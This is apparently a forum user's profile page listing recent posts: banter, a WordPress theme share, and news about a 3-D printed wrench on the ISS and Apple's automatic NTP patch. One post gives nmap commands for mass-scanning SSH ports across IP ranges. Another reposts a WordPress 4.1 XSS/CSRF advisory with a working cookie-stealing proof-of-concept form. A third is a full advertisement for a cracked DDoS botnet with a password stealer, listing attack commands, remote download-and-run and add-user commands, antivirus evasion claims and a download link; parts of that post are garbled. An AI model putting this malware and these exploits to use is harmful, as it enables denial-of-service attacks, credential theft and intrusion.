htmanpro

Members
  • Posts

    39
  • Joined

  • Last visited

  • Days Won

    1

htmanpro last won the day on December 27 2014

htmanpro had the most liked content!

About htmanpro

  • Birthday 09/06/1996

Converted

  • Occupation
    Grass grower :))
  • Interests
    aashdwahsdn, asdhwasd and asdhhwadw
  • Location
    127.0.0.1

htmanpro's Achievements

Newbie

Newbie (1/14)

66

Reputation

  1. Whoa, enough! He just tried his luck too, what do you want now =))?
  2. Why the fuck are you censoring? On: Selling/trading/etc. involving roots is not permitted
  3. htmanpro

    14/88

    Stay calm, they can't stand you either :D! On: Welcome
  4. htmanpro

    Farewell RST

    Mistresses to support.... On: Man, I don't know you that well, but I've been visiting the forum for 1-2 years as a guest and I've seen that you're active and have useful posts; you're a core member around here.. I hope maybe you'll come back someday..
  5. nmap -p 22 24.1.*.* -oN fisier.txt or alternatively nmap -p 22 24.5.0.1/16 -oS fisier.txt or nmap -p 22 24.1.0-255.1-254 -oN fisier.txt
  6. Document Title:
     ===============
     Wordpress 4.1 - XSS & CSRF Web Vulnerability

     Release Date:
     =============
     2014-12-30

     Product & Service Introduction:
     ===============================
     https://wordpress.org/

     Abstract Advisory Information:
     ==============================
     The Hackyard Security Group pentest team discovered a cross site request forgery issue and a cross site vulnerability in the Wordpress 4.1

     Vulnerability Disclosure Timeline:
     ==================================
     2014-12-27: Author Notification (0x0A)
     2014-12-30: Public Disclosure

     Discovery Status:
     =================
     Published

     Affected Product(s):
     ====================
     Product: Wordpress 4.1

     Exploitation Technique:
     =======================
     Remote

     Severity Level:
     ===============
     Medium

     Technical Details & Description:
     ================================
     A client-side cross site request forgery issue and a cross site scripting vulnerability has been discovered in the Wordpress version 4.1 The client-side cross site request forgery vulnerability allows remote attackers to force client-side requests to execute application functions. The client-side cross site scripting vulnerability allows remote attackers to inject malicious script codes to compromise administrator session data.

     The XSS vulnerability is located in comment values of the wp-comments-post.php file POST method request. Remote attackers are able to inject malicious script codes to the client-side application request. The CSRF vulnerability is located in the same value request and allows to request the account session data. Both issues are only exploitable on the client-side of the application and the request method to inject is POST.

     The security risk of the client-side web vulnerability is estimated as medium with a CVSS (common vulnerability scoring system) count of 2.5. Exploitation of the client-side web vulnerability requires no privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerabilities result in non-persistent phishing mails, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected module context.

     Request Method(s):
     [+] POST

     Vulnerable Module(s):
     [+] comment

     Vulnerable Parameter(s):
     [+] comment=

     Affected Module(s):
     [+] wp-comments-post.php

     Proof of Concept (PoC):
     =======================
     The client-side cross site request forgery issue and a cross site scripting vulnerability can be exploited by remote attackers with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

     Manual steps to reproduce the vulnerabilities: You can use the following exploit code to verify the vulnerability. Save the code as .html. The malicious page needs to be surfed by a non expired administrator session to take over the user session data.

     PoC: wp-comments-post.php

     <html>
     <!-- CSRF PoC - generated by **0x0A** -->
     <body>
     <form action="http://127.0.0.1/wordpress/wp-comments-post.php" method="POST">
     <input type="hidden" name="author" value="Pentest" />
     <input type="hidden" name="email" value="pentest@hackyard.net" />
     <input type="hidden" name="url" value="https://hackyard.net" />
     <input type="alert" name="comment" value="<script>alert(document.cookie);</script>" />
     <input id="submit" class="submit" type="submit" value="Post Comment" name="submit">
     <input id="comment_post_ID" type="hidden" value="8" name="comment_post_ID">
     <input id="comment_parent" type="hidden" value="0" name="comment_parent">
     <input id="_wp_unfiltered_html_comment_disabled" type="hidden" value="d1a069167f" name="_wp_unfiltered_html_comment">
     </form>
     </body>
     </html>

     Reference(s):Video
     ======================
     LINK: https://www.youtube.com/watch?v=UD-iwqphWlk
     POC: https://www.youtube.com/watch?v=HL7ETe3A4Wg

     Solution - Fix & Patch:
     =======================
     2014-11-24: Filtering an html comments

     Security Risk:
     ==============
     The security risk of the cross site request forgery and cross site scripting vulnerability is estimated as medium. (CVSS 2.5)

     Credits & Authors:
     ==================
     Neo Hapsis aka 0x0A- Information Security Researcher [https://hackyard.net]

     Disclaimer & Information:
     =========================
     The information provided in this advisory is provided as it is without any warranty. Hackyard Security Group disclaims all warranties, either expressed or implied, including the warranties of merchant ability and capability for a particular purpose. Hackyard Security Group or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Hackyard Security Group or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,policies, deface websites, hack into databases or trade with fraud/stolen material.

     Domains: https://hackyard.net
     Contact: admin@hackyard.net
     Facebook: facebook.com/Hackyard.net
     YouTube: youtube.com/user/HackyardSG

     Any modified copy or reproduction, including partially usages, of this file requires authorization from Hackyard Security Group. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Hackyard Security Group or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of Hackyard Security Group & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@hackyard.net) to get a permission.

     Source: hk
  7. Features - Written in c + +, easily crypt is lightweight (compressed sample <15KB) - Full compatibility with all windows family (x86 and x64) - Bot has 7 types of attacks - Extremely stable system. Load on CPU and ram is very powerful. - does not attract attention to UAC Windows Firewall - can install port, referal and cookies individually for each attack - Supports up to 10 targets simultaneously - has a very low load on the cpu with the new, complex system parsing Teams (all analogs parsing passes within a function in multiple threads - it's extra work load on the processor. New bot enters all data in the array before the attack and come ready function parameters: address, port, referral, etc.) - has enormous power output of more than 1500 http (and more 30,000 udp) requests per minute due to direct interaction with network drivers, even on Windows Desktop! (Only when using winsock) is about 10 times more than some analogues and several more top (on this indicator) competitors. - in the control panel are: the number of requests per minute, right in the system, the version of the system. - Supports bypassing Cloudflare protection (!) and many other, more simple. - support and slow get slow post! mode - indicated in the packet header off the cache (cache-control: no-cache), which increases the load on the server. - Bot protection of panel. Modules: - PassGrabber (stealer): this module find and decrypt passwords. 26 software units supported (on octouber 2014). price $150 for base licence, $250 for lite licence, free for full. Detection: Validation build (without crypt and packing) only 3 AV’s of all triggered suspicion (avira, clamav, vba32). during local tests Kaspersky, nNod32, Drweb, Avast all missed file in 100% of cases. Attack modes and commands: As the system is a professional syntax with commands, this seems complicated, but only at first glance =) • dd1 basic operation by http protocol method get, using sokkety. 
support *** cookies and $ $ $ ref and allows up to 10 targets simultaneously (separated by ";"). the fastest search volume attack. Example: DD1 = ?????? cookies *** $ $ $ referal; http://mail.ru cookies2 *** $ $ $ referal2 • dd2 the same treatment as dd1, only the method of post. added optional parameter @ @ @ post_data. also supports up to 10 goals. Example: dd2 = ????? ?.?.?. - ??????? ??????? ??????, ???????????? ??????? PHP, MySQL ? Perl. ????????? ??????????? ??????? ?? ????????? ?????. ??????? ????? ?? *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh a script • dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3 = http://host.com/script.php • dd4 attack http post method using the system library wininet. the same as dd3, only post. Example: DD4 = @ @ @ http://host.com/script.php @ @ @ = login & password = yyy hhh • dd5 icmp attack (pings). supports up to 10 targets. Example dd5 = 198.168.0.1; 199.0.0.1 • dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6 = 192.168.0.2:27015 @ @ @ flud_text • dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal • cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = ???? ???? ? ?????????, then (after fifteen minutes) cfa = ???? ???? ? ????????? • cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add • exe command to load and run the exe file. does not stop the execution of other commands. 
file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe = http://site.com/filename.exe Control Panel: We used a modified ~ 70% from another complex (purchased under agreements to resell and change), rewriting it almost completely, as it was found too many mistakes and did not like the code. Naturally everything was corrected and optimized - new pu you like it! Demonstration: how well the system is very powerful and to demonstrate the need 15-20 bots, which are always available - Sellers will try to demonstrate power. Prices: - Test License $0 (only for checking the forums and testers. updates not provided) - Lite Licence $300 (update/rebuild $100, upgrade to the new version $ 100) - Basic License $500 (Update / Rebuild $ 50 upgrade to the new version $ 100, the price of the modules will be installed later) - full license $950 (all updates Rebuild and modules are free) INSTRUCTIONS: 1) Setup panel, read the howto included. (PS: Your MasterKey is: 0x2222) 2) Open the builder (do not open "madnesscracked.exe) 3) Write in URL in the builder, the url are usually http://yourdomain.com/index.php 4) Click Update URL, should display a messagebox that the url has been changed. 5) Your file is madnesscracked.exe (after you update url) Downlaod: https://mega.co.nz/#!y85BkRzQ!b9mXFMehpzHGqxluTuMg_p8hh7oGAza9S1m8HxvPaqQ SourcE: trojanforge
  8. Hi, a friend (SmartFX) and I have started creating WordPress themes and themes for other platforms, HTML templates.. We "managed" to modify a theme: the images + some scripts + CSS (we didn't create it from scratch because we don't know PHP). Demo Screenshot - The theme is free! - The PSDs (background/logo) are in the "images" folder! Download: Zippyshare.com - hitsmart-design.rar https://www.sendspace.com/file/8n5416 We're waiting for opinions and criticism!
  9. Well, you installed some add-on "infected" with that ad; try uninstalling all of them to see which one it comes from, and afterwards install only what you need, don't install every crappy extension!
  10. htmanpro

    [XSS] ESET NOD32

    Congratulations, bro! Buy us each a beer from the reward if anything comes of it :))
  11. you didn't put the stealer's password in the config as well!
  12. Astronaut Barry Wilmore asked for a ratcheting socket wrench

      Astronauts on the International Space Station have used their 3-D printer to make a wrench from instructions sent up in an email. It is the first time hardware has been "emailed" to space. Nasa was responding to a request by ISS commander Barry Wilmore for a ratcheting socket wrench. Previously, if astronauts requested a specific item they could have waited months for it to be flown up on one of the regular supply flights.

      Mike Chen, founder of Made In Space, the company behind the 3-D printer, said: "We had overheard ISS Commander Barry Wilmore (who goes by "Butch") mention over the radio that he needed one, so we designed one in CAD and sent it up to him faster than a rocket ever could have."

      Mr Wilmore installed the printer on the ISS on 17 November. On 25 November he used the machine to fabricate its first object, a replacement part for the printer. Nasa says the capability will help astronauts be more self-reliant on future long duration space missions.

      Mike Chen added: "The socket wrench we just manufactured is the first object we designed on the ground and sent digitally to space, on the fly. "It also marks the end of our first experiment—a sequence of 21 prints that together make up the first tools and objects ever manufactured off the surface of the Earth." The other 21 objects were designed before the 3D printer was shipped to the space station in September on a SpaceX Dragon supply flight.

      Analysis: David Shukman, BBC science editor

      If a 3D printer can churn out something as useful as a tool in space, what else is possible? Spare parts, components, even equipment, according to the company behind the printer, Made In Space. And that's just the start. As one might expect from an energetic Silicon Valley start-up, the vision is mind-boggling. Already it plans to send a larger 3D manufacturing machine into orbit next year.

      The ambition is for Nasa or other space agencies or companies to routinely send their printing orders up to the International Space Station and for a range of objects to be produced. This would open the way to create hardware not only for the ISS itself but also for equipment to be deployed beyond it, conceivably such as satellites.

      And, looking further ahead, the thinking becomes even more radical. Made In Space says it's been trying out possible raw materials for its printers including a substance similar to lunar soil. So in theory, a 3D printer despatched to the Moon might be able to dig into the lunar surface, scoop up what is called the regolith, and transform it into the elements needed for a moon base. That prospect is extremely distant, obviously. For the moment, the astronauts on board the ISS will be happy to know that if they need a new spanner, they can make one in under an hour.

      Source
  13. This is the first time automatic updates have been sent to Mac computers around the world Apple has sent out its first automatic security update for Mac computers as researchers warn about new bugs. Previously Apple has released security patches through its regular software update system which requires user approval. The latest bugs were so severe it felt it needed to get customers protected immediately, the firm said. "The update is seamless. It doesn't even require a restart," Apple spokesman Bill Evans told Reuters. The Mac bugs were mentioned in security bulletins issued last week by the Department of Homeland Security and the Carnegie Mellon University Software Engineering Institute. It identified dozens of technology companies, including Apple, whose products might be vulnerable. The vulnerability targets a component of its OS X operating system called the network time protocol (NTP) which is used for synchronising clocks on computer systems. The protocol is a global method of synchronising time over a network and has previously been exploited by hackers. Microsoft has been offering automatic updates for security flaws for some time. Apple developed technology for automatically pushing out security updates two years ago but has never previously used it. The firm said that it did not know of any cases where hackers had exploited the bug. Source